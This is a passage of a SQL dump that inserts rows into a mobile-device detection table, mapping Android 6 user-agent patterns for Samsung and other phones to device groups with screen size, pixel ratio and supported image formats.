Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S6S55IN3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S6S5IN3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S6s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S8 mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; S9+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A300FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A310F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A500FU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A510M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A700FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A8000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}');
INSERT INTO `xyhmu_mj_amdd` VALUES ('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A800I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-A9100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-C7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G389F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G532F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G532G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G532M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G532MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G550T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G550T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G5520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G600FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G610Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G800M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900FD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G900W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G901F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G903F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G903M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G906K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G928A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G930U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G930V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J106B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J106F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J106H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; SAMSUNG SM-J106M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 